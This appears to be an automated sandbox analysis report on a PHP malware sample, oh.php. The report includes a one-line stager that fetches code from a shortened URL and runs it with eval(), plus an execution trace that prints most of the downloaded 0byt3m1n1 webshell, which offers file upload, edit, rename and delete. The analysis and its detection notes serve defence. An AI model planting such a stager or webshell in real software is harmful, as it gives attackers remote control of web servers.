PHP Malware Analysis

oh.php

md5: 90dc8156df1e7f86cb616f46f22e82c8


Screenshot


Attributes

Environment

Execution

Files

Input

Title

URLs
  • http://zerobyte.id/ (HTML)
  • https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js (HTML, Traces)
  • https://bit.ly/3jhOwIp (Deobfuscated, Original, Traces)
  • https://fonts.googleapis.com/css?family=VT323 (HTML, Traces)
  • https://fonts.googleapis.com/css2?family=Balsamiq+Sans:ital@1&display=swap (HTML, Traces)
  • https://i.imgur.com/J5cDUtx.png (HTML, Traces)
  • https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/464036103& (HTML)
  • https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/464036103&color=%23ff1493&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true (Traces)


Deobfuscated PHP code

<?php

// Stager (remote loader): the file on disk carries no payload of its own.
// On every request it downloads text from the shortened URL and runs it
// with eval(). The leading "?>" drops eval() out of PHP mode, so the
// downloaded text, which begins with its own "<?php" tag in the recorded
// trace, is parsed as a complete PHP file.
//
// In the recorded trace the downloaded code identifies itself as
// "0byt3m1n1 - 2.2", a minishell that renders a file browser with upload,
// rename, edit and delete actions driven by $_GET / $_POST / $_FILES.
// eval() returned NULL in that run, so this echo prints nothing itself;
// the page output comes from the payload's own echo statements.
//
// Defensive notes:
// - Scanning this file's content only sees eval() on the result of
//   file_get_contents() with a remote URL. The trace reports the on-disk
//   file as 61 bytes, and the md5 listed for oh.php covers only this
//   stager, so whoever controls the link target can change the payload
//   without changing the file or its hash.
// - The fetch relies on PHP's URL stream wrappers; with allow_url_fopen
//   disabled, file_get_contents() cannot retrieve an https:// URL.
// - Useful signals: an outbound HTTPS request from the PHP worker to a
//   URL shortener, and eval() applied to data fetched over the network.
// - NOTE(review): the trace ran the sample from an uploads directory in
//   the analysis sandbox; the original delivery path is not shown here.
//   Denying PHP execution in upload directories would stop this stager
//   from running if that is how it arrives.
echo eval("?>" . file_get_contents("https://bit.ly/3jhOwIp"));

Execution traces

data/traces/90dc8156df1e7f86cb616f46f22e82c8_trace-1676251797.7344.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:30:23.632272]
1	0	1	0.000206	393464
1	3	0	0.000266	393432	{main}	1		/var/www/html/uploads/oh.php	0	0
2	4	0	0.000288	393432	file_get_contents	0		/var/www/html/uploads/oh.php	1	1	'https://bit.ly/3jhOwIp'
2	4	1	0.200093	410744
2	4	R			'<?php\r\n\r\n/*\r\n    0 b y t 3 m 1 n 1 - 2.2\r\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n\r\n    Recoded by xRyukZ \r\n    Theme Zerotwo\r\n    facebook.com/sawalrever\r\n*/\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n\r\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-02";\r\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x'
2	5	0	0.200475	464816	eval	1	'?><?php\r\n\r\n/*\r\n    0 b y t 3 m 1 n 1 - 2.2\r\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n\r\n    Recoded by xRyukZ \r\n    Theme Zerotwo\r\n    facebook.com/sawalrever\r\n*/\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n\r\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-02";\r\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\r\n$rm__dir     = "\\x72\\x6d\\x64" . "ir";\r\n$un__link    = "\\x75\\x6e" . "\\x6c\\x69\\x6e\\x6b";\r\n\r\nif (get_magic_quotes_gpc()) {\r\n    foreach ($_POST as $key => $value) {\r\n        $_POST[$key] = stripslashes($value);\r\n    }\r\n}\r\n\r\necho \'<!DOCTYPE html><html>\r\n    <head>\r\n    <style>\r\n    @import url(https://fonts.googleapis.com/css2?family=Balsamiq+Sans:ital@1&display=swap);\r\n     body {\r\n    background: url(https://i.imgur.com/J5cDUtx.png) no-repeat center center fixed; \r\n    background-size: cover;\r\n    color:white;\r\n    font-family: "Balsamiq Sans", cursive;\r\n    margin:0;\r\n    font-size: 14px; \r\n     } \r\n     h1 {\r\n    font-family:"Balsamiq Sans", cursive;\r\n    font-size:50px;\r\n    margin:0; \r\n    color:#FF1493;\r\n     } \r\n     h1:hover { \r\n    color:#FF69B4;\r\n     } \r\n     select { \r\n    background:white;\r\n    color:black; \r\n    }\r\n     a { \r\n    color:#FF1493;\r\n    text-decoration:none;\r\n    font-family:"Balsamiq Sans", cursive; \r\n     } \r\n     textarea { \r\n    width:700px;\r\n    height:300px;\r\n    background:#FFB6C1;\r\n    border:2px solid black;\r\n    color:black;\r\n    padding:5px;\r\n     } \r\n     tr:hover { \r\n        background: #FFC0CB; } \r\n     th { \r\n        background:transparent;\r\n        padding:3px; }\r\n    </style>\r\n    <meta 
name="robots" content"noindex. nofollow">\r\n    <link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">\r\n    <title>\'.$sname.\'</title>\r\n    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\r\n    </head>\r\n    <body>\';\r\n\r\necho \'<div style="color:#ef6c00;margin-top:0;"><h1><center>\' . $sname . \'</center></h1></div>\';\r\necho \'<iframe width="100%" height="20" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/464036103&color=%23ff1493&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>\';\r\nif (isset($_GET[\'path\'])) {\r\n    $path = $_GET[\'path\'];\r\n    chdir($_GET[\'path\']);\r\n} else {\r\n    $path = $__gcdir();\r\n}\r\n$path  = str_replace("\\\\", "/", $path);\r\n$paths = explode("/", $path);\r\necho \'<hr color="FF1493" style="margin-top:0;width:99%"><table width="100%" border="0" align="center" style="margin-top:0px;"><tr><td>\';\r\necho "<font color=\'#FF1493\' style=\'font-size:14px;\'>Theme By xRyukZ.";\r\necho "<br>";\r\necho "<font style=\'font-size:14px;\'>Path: ";\r\nforeach ($paths as $id => $pat) {\r\n    echo "<a style=\'font-size:14px;\' href=\'?path=";\r\n    for ($i = 0; $i <= $id; $i++) {\r\n        echo $paths[$i];\r\n        if ($i != $id) {\r\n            echo "/";\r\n        }\r\n    }\r\n    echo "\'>$pat</a>/";\r\n}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="30%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:white;margin-bottom:10px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif (isset($_FILES[\'file\'])) {\r\n    if (copy($_FILES[\'file\'][\'tmp_name\'], $path . \'/\' . 
$_FILES[\'file\'][\'name\'])) {\r\n        echo \'<center><font color="#00ff00">Upload OK!</font></center><br/>\';\r\n    } else {\r\n        echo \'<center><font color="red">Upload FAILED!</font></center><br/>\';\r\n    }\r\n}\r\necho \'<hr color="FF1493" style="margin-top:0;width:99%;">\';\r\nif (isset($_GET[\'filesrc\'])) {\r\n    echo \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';\r\n    echo "" . basename($_GET[\'filesrc\']);\r\n    "";\r\n    echo \'</tr></td></table><br />\';\r\n    echo ("<center><textarea readonly=\'\'>" . htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])) . "</textarea></center>");\r\n} elseif (isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\') {\r\n    echo \'</table><br /><center>\' . $_POST[\'path\'] . \'<br /><br />\';\r\n    if ($_POST[\'opt\'] == \'rename\') {\r\n        if (isset($_POST[\'newname\'])) {\r\n            if (rename($_POST[\'path\'], $path . \'/\' . $_POST[\'newname\'])) {\r\n                echo \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n            } else {\r\n                echo \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n            }\r\n            $_POST[\'name\'] = $_POST[\'newname\'];\r\n        }\r\n        echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\' . $_POST[\'name\'] . \'" /> <input type="hidden" name="path" value="\' . $_POST[\'path\'] . 
\'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>\';\r\n    } elseif ($_POST[\'opt\'] == \'edit\') {\r\n        if (isset($_POST[\'src\'])) {\r\n            $fp = fopen($_POST[\'path\'], \'w\');\r\n            if (fwrite($fp, $_POST[\'src\'])) {\r\n                echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n            } else {\r\n                echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';\r\n            }\r\n            fclose($fp);\r\n        }\r\n        echo \'<form method="POST"><textarea cols=80 rows=20 name="src">\' . htmlspecialchars($__fgetcon7s($_POST[\'path\'])) . \'</textarea><br /><input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>\';\r\n    }\r\n    echo \'</center>\';\r\n} else {\r\n    echo \'</table><br /><center>\';\r\n    if (isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\') {\r\n        if ($_POST[\'type\'] == \'dir\') {\r\n            if ($rm__dir($_POST[\'path\'])) {\r\n                echo \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n            } else {\r\n                echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';\r\n            }\r\n        } elseif ($_POST[\'type\'] == \'file\') {\r\n            if ($un__link($_POST[\'path\'])) {\r\n                echo \'<font color="#00ff00">Delete File Done.</font><br />\';\r\n            } else {\r\n                echo \'<font color="red">Delete File Error.</font><br />\';\r\n            }\r\n        }\r\n    }\r\n    echo \'</center>\';\r\n    $_scdir = $__scdir($path);\r\n    echo \'<div id="content"><table width="80%" border="0" cellpadding="4" cellspacing="2" align="center"><tr class="first"> <th><center>Name</center></th><th width="10%"><center>Size</center></th><th width="20%"><center>Permissions</center></th> <th 
width="20%"><center>Last Update</center></th><th width="11%"><center>Actions</center></th></tr>\';\r\n    foreach ($_scdir as $dir) {\r\n        if (!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\')\r\n            continue;\r\n        echo "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\n        if (is_writable("$path/$dir"))\r\n            echo \'<font color="#00ff00">\';\r\n        elseif (!is_readable("$path/$dir"))\r\n            echo \'<font color="red">\';\r\n        echo perms("$path/$dir");\r\n        if (is_writable("$path/$dir") || !is_readable("$path/$dir"))\r\n            echo \'</font>\';\r\n        echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";\r\n        echo "</center></td> <td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\"><input type=\\"submit\\" value=\\">\\" /></form></center></td></tr>";\r\n    }\r\n    foreach ($_scdir as $file) {\r\n        if (!is_file("$path/$file"))\r\n            continue;\r\n        $size = filesize("$path/$file") / 1024;\r\n        $size = round($size, 3);\r\n        if ($size >= 1024) {\r\n            $size = round($size / 1024, 2) . \' MB\';\r\n        } else {\r\n            $size = $size . \' KB\';\r\n        }\r\n        echo "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>" . $size . 
"</center></td><td><center>";\r\n        if (is_writable("$path/$file"))\r\n            echo \'<font color="#00ff00">\';\r\n        elseif (!is_readable("$path/$file"))\r\n            echo \'<font color="red">\';\r\n        echo perms("$path/$file");\r\n        if (is_writable("$path/$file") || !is_readable("$path/$file"))\r\n            echo \'</font>\';\r\n        echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";\r\n        echo "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\"><input type=\\"submit\\" value=\\">\\" /></form></center></td></tr>";\r\n    }\r\n    echo \'</table></div>\';\r\n}\r\nfunction perms($file)\r\n{\r\n    $perms = fileperms($file);\r\n    if (($perms & 0xC000) == 0xC000) {\r\n        $info = \'s\';\r\n    } elseif (($perms & 0xA000) == 0xA000) {\r\n        $info = \'l\';\r\n    } elseif (($perms & 0x8000) == 0x8000) {\r\n        $info = \'-\';\r\n    } elseif (($perms & 0x6000) == 0x6000) {\r\n        $info = \'b\';\r\n    } elseif (($perms & 0x4000) == 0x4000) {\r\n        $info = \'d\';\r\n    } elseif (($perms & 0x2000) == 0x2000) {\r\n        $info = \'c\';\r\n    } elseif (($perms & 0x1000) == 0x1000) {\r\n        $info = \'p\';\r\n    } else {\r\n        $info = \'u\';\r\n    }\r\n    $info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n    $info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\') : (($perms & 0x0800) ? \'S\' : \'-\'));\r\n    $info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n    $info .= (($perms & 0x0010) ? 
\'w\' : \'-\');\r\n    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\') : (($perms & 0x0400) ? \'S\' : \'-\'));\r\n    $info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n    $info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\') : (($perms & 0x0200) ? \'T\' : \'-\'));\r\n    return $info;\r\n}\r\necho \'<br><center>&copy; <span id="footer"></span> 2020.</center><br>\';\r\necho \'<script type="text/javascript" src="//zerobyte-id.github.io/PHP-Backdoor/inc/footer.js"></script>\';\r\necho \'</body></html>\';\r\n?>'	/var/www/html/uploads/oh.php	1	0
3	6	0	0.200696	464816	set_time_limit	0		/var/www/html/uploads/oh.php(1) : eval()'d code	12	1	0
3	6	1	0.200715	464880
3	6	R			FALSE
3	7	0	0.200729	464848	error_reporting	0		/var/www/html/uploads/oh.php(1) : eval()'d code	13	1	0
3	7	1	0.200743	464888
3	7	R			22527
3	8	0	0.200764	464848	error_log	0		/var/www/html/uploads/oh.php(1) : eval()'d code	14	1	0
3	8	1	0.200794	464880
3	8	R			TRUE
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	16	$sname = '0byt3m1n1-02'
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	17	$__gcdir = 'getcwd'
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	18	$__fgetcon7s = 'file_get_contents'
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	19	$__scdir = 'scandir'
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	20	$rm__dir = 'rmdir'
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	21	$un__link = 'unlink'
3	9	0	0.200873	464848	get_magic_quotes_gpc	0		/var/www/html/uploads/oh.php(1) : eval()'d code	23	0
3	9	1	0.200885	464848
3	9	R			FALSE
3	10	0	0.200901	464848	getcwd	0		/var/www/html/uploads/oh.php(1) : eval()'d code	86	0
3	10	1	0.200915	464896
3	10	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	86	$path = '/var/www/html/uploads'
3	11	0	0.200940	464896	str_replace	0		/var/www/html/uploads/oh.php(1) : eval()'d code	88	3	'\\'	'/'	'/var/www/html/uploads'
3	11	1	0.200955	464992
3	11	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	88	$path = '/var/www/html/uploads'
3	12	0	0.200979	464896	explode	0		/var/www/html/uploads/oh.php(1) : eval()'d code	89	2	'/'	'/var/www/html/uploads'
3	12	1	0.200994	465472
3	12	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	89	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	94	$id = 0
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i = 0
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	94	$id = 1
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i = 0
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	94	$id = 2
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i = 0
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	94	$id = 3
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i = 0
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	94	$id = 4
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i = 0
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	96	$i++
3	13	0	0.201338	465400	scandir	0		/var/www/html/uploads/oh.php(1) : eval()'d code	162	1	'/var/www/html/uploads'
3	13	1	0.201382	466016
3	13	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'oh.php', 5 => 'prepend.php']
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	162	$_scdir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'oh.php', 5 => 'prepend.php']
3	14	0	0.201439	466032	is_dir	0		/var/www/html/uploads/oh.php(1) : eval()'d code	165	1	'/var/www/html/uploads/.'
3	14	1	0.201464	466096
3	14	R			TRUE
3	15	0	0.201513	466064	is_dir	0		/var/www/html/uploads/oh.php(1) : eval()'d code	165	1	'/var/www/html/uploads/..'
3	15	1	0.201529	466112
3	15	R			TRUE
3	16	0	0.201548	466072	is_dir	0		/var/www/html/uploads/oh.php(1) : eval()'d code	165	1	'/var/www/html/uploads/.htaccess'
3	16	1	0.201565	466112
3	16	R			FALSE
3	17	0	0.201584	466072	is_dir	0		/var/www/html/uploads/oh.php(1) : eval()'d code	165	1	'/var/www/html/uploads/data'
3	17	1	0.201614	466112
3	17	R			TRUE
3	18	0	0.201627	466072	is_writable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	168	1	'/var/www/html/uploads/data'
3	18	1	0.201646	466112
3	18	R			TRUE
3	19	0	0.201660	466072	perms	1		/var/www/html/uploads/oh.php(1) : eval()'d code	172	1	'/var/www/html/uploads/data'
4	20	0	0.201673	466072	fileperms	0		/var/www/html/uploads/oh.php(1) : eval()'d code	203	1	'/var/www/html/uploads/data'
4	20	1	0.201687	466112
4	20	R			16895
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	203	$perms = 16895
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	213	$info = 'd'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	221	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	222	$info .= 'w'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	223	$info .= 'x'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	224	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	225	$info .= 'w'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	226	$info .= 'x'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	227	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	228	$info .= 'w'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	229	$info .= 'x'
3	19	1	0.201809	466112
3	19	R			'drwxrwxrwx'
3	21	0	0.201823	466072	is_writable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	173	1	'/var/www/html/uploads/data'
3	21	1	0.201839	466112
3	21	R			TRUE
3	22	0	0.201853	466072	filemtime	0		/var/www/html/uploads/oh.php(1) : eval()'d code	175	1	'/var/www/html/uploads/data'
3	22	1	0.201866	466112
3	22	R			1676251797
3	23	0	0.201879	466016	date	0		/var/www/html/uploads/oh.php(1) : eval()'d code	175	2	'd-M-Y H:i'	1676251797
3	23	1	0.201943	468408
3	23	R			'12-Feb-2023 20:29'
3	24	0	0.201962	468136	is_dir	0		/var/www/html/uploads/oh.php(1) : eval()'d code	165	1	'/var/www/html/uploads/oh.php'
3	24	1	0.201979	468176
3	24	R			FALSE
3	25	0	0.201993	468144	is_dir	0		/var/www/html/uploads/oh.php(1) : eval()'d code	165	1	'/var/www/html/uploads/prepend.php'
3	25	1	0.202009	468192
3	25	R			FALSE
3	26	0	0.202022	468136	is_file	0		/var/www/html/uploads/oh.php(1) : eval()'d code	179	1	'/var/www/html/uploads/.'
3	26	1	0.202038	468160
3	26	R			FALSE
3	27	0	0.202051	468128	is_file	0		/var/www/html/uploads/oh.php(1) : eval()'d code	179	1	'/var/www/html/uploads/..'
3	27	1	0.202065	468176
3	27	R			FALSE
3	28	0	0.202078	468136	is_file	0		/var/www/html/uploads/oh.php(1) : eval()'d code	179	1	'/var/www/html/uploads/.htaccess'
3	28	1	0.202093	468176
3	28	R			TRUE
3	29	0	0.202106	468136	filesize	0		/var/www/html/uploads/oh.php(1) : eval()'d code	181	1	'/var/www/html/uploads/.htaccess'
3	29	1	0.202119	468176
3	29	R			64
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	181	$size = 0.0625
3	30	0	0.202143	468080	round	0		/var/www/html/uploads/oh.php(1) : eval()'d code	182	2	0.0625	3
3	30	1	0.202157	468152
3	30	R			0.063
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	182	$size = 0.063
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	186	$size = '0.063 KB'
3	31	0	0.202193	468176	is_writable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	189	1	'/var/www/html/uploads/.htaccess'
3	31	1	0.202210	468216
3	31	R			FALSE
3	32	0	0.202222	468176	is_readable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	191	1	'/var/www/html/uploads/.htaccess'
3	32	1	0.202238	468216
3	32	R			TRUE
3	33	0	0.202250	468176	perms	1		/var/www/html/uploads/oh.php(1) : eval()'d code	193	1	'/var/www/html/uploads/.htaccess'
4	34	0	0.202264	468176	fileperms	0		/var/www/html/uploads/oh.php(1) : eval()'d code	203	1	'/var/www/html/uploads/.htaccess'
4	34	1	0.202277	468216
4	34	R			33188
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	203	$perms = 33188
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	209	$info = '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	221	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	222	$info .= 'w'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	223	$info .= '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	224	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	225	$info .= '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	226	$info .= '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	227	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	228	$info .= '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	229	$info .= '-'
3	33	1	0.202402	468216
3	33	R			'-rw-r--r--'
3	35	0	0.202415	468176	is_writable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	194	1	'/var/www/html/uploads/.htaccess'
3	35	1	0.202430	468216
3	35	R			FALSE
3	36	0	0.202443	468176	is_readable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	194	1	'/var/www/html/uploads/.htaccess'
3	36	1	0.202458	468216
3	36	R			TRUE
3	37	0	0.202471	468176	filemtime	0		/var/www/html/uploads/oh.php(1) : eval()'d code	196	1	'/var/www/html/uploads/.htaccess'
3	37	1	0.202484	468216
3	37	R			1676251797
3	38	0	0.202497	468120	date	0		/var/www/html/uploads/oh.php(1) : eval()'d code	196	2	'd-M-Y H:i'	1676251797
3	38	1	0.202527	468448
3	38	R			'12-Feb-2023 20:29'
3	39	0	0.202549	468288	is_file	0		/var/www/html/uploads/oh.php(1) : eval()'d code	179	1	'/var/www/html/uploads/data'
3	39	1	0.202565	468328
3	39	R			FALSE
3	40	0	0.202578	468288	is_file	0		/var/www/html/uploads/oh.php(1) : eval()'d code	179	1	'/var/www/html/uploads/oh.php'
3	40	1	0.202593	468328
3	40	R			TRUE
3	41	0	0.202605	468288	filesize	0		/var/www/html/uploads/oh.php(1) : eval()'d code	181	1	'/var/www/html/uploads/oh.php'
3	41	1	0.202619	468328
3	41	R			61
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	181	$size = 0.0595703125
3	42	0	0.202642	468192	round	0		/var/www/html/uploads/oh.php(1) : eval()'d code	182	2	0.0595703125	3
3	42	1	0.202656	468264
3	42	R			0.06
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	182	$size = 0.06
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	186	$size = '0.06 KB'
3	43	0	0.202691	468280	is_writable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	189	1	'/var/www/html/uploads/oh.php'
3	43	1	0.202706	468320
3	43	R			FALSE
3	44	0	0.202719	468280	is_readable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	191	1	'/var/www/html/uploads/oh.php'
3	44	1	0.202733	468320
3	44	R			TRUE
3	45	0	0.202746	468280	perms	1		/var/www/html/uploads/oh.php(1) : eval()'d code	193	1	'/var/www/html/uploads/oh.php'
4	46	0	0.202786	468280	fileperms	0		/var/www/html/uploads/oh.php(1) : eval()'d code	203	1	'/var/www/html/uploads/oh.php'
4	46	1	0.202801	468320
4	46	R			33204
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	203	$perms = 33204
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	209	$info = '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	221	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	222	$info .= 'w'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	223	$info .= '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	224	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	225	$info .= 'w'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	226	$info .= '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	227	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	228	$info .= '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	229	$info .= '-'
3	45	1	0.202936	468320
3	45	R			'-rw-rw-r--'
3	47	0	0.202950	468280	is_writable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	194	1	'/var/www/html/uploads/oh.php'
3	47	1	0.202966	468320
3	47	R			FALSE
3	48	0	0.202979	468280	is_readable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	194	1	'/var/www/html/uploads/oh.php'
3	48	1	0.202994	468320
3	48	R			TRUE
3	49	0	0.203006	468280	filemtime	0		/var/www/html/uploads/oh.php(1) : eval()'d code	196	1	'/var/www/html/uploads/oh.php'
3	49	1	0.203019	468320
3	49	R			1676251797
3	50	0	0.203032	468224	date	0		/var/www/html/uploads/oh.php(1) : eval()'d code	196	2	'd-M-Y H:i'	1676251797
3	50	1	0.203067	468552
3	50	R			'12-Feb-2023 20:29'
3	51	0	0.203083	468288	is_file	0		/var/www/html/uploads/oh.php(1) : eval()'d code	179	1	'/var/www/html/uploads/prepend.php'
3	51	1	0.203099	468336
3	51	R			TRUE
